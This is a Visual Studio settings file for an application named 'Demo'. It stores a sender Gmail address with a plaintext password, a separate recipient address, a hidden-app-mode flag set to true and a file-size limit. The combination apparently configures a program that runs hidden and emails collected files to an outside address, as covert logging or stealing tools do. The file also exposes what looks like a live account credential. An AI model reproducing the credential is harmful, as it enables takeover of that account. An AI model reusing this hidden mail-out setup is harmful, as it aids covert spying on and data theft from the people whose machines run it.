<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="Demo.Properties" GeneratedClassName="Settings">
  <Profiles />
  <Settings>
    <Setting Name="EmailAddressFrom" Type="System.String" Scope="User">
      <Value Profile="(Default)">ka1oken4by@gmail.com</Value>
    </Setting>
    <Setting Name="Password" Type="System.String" Scope="User">
      <Value Profile="(Default)">19980319lesh1</Value>
    </Setting>
    <Setting Name="EmailAddressTo" Type="System.String" Scope="User">
      <Value Profile="(Default)">mugory@cars2.club</Value>
    </Setting>
    <Setting Name="IsHiddenAppMode" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">True</Value>
    </Setting>
    <Setting Name="FileSize" Type="System.Int32" Scope="User">
      <Value Profile="(Default)">10</Value>
    </Setting>
  </Settings>
</SettingsFile>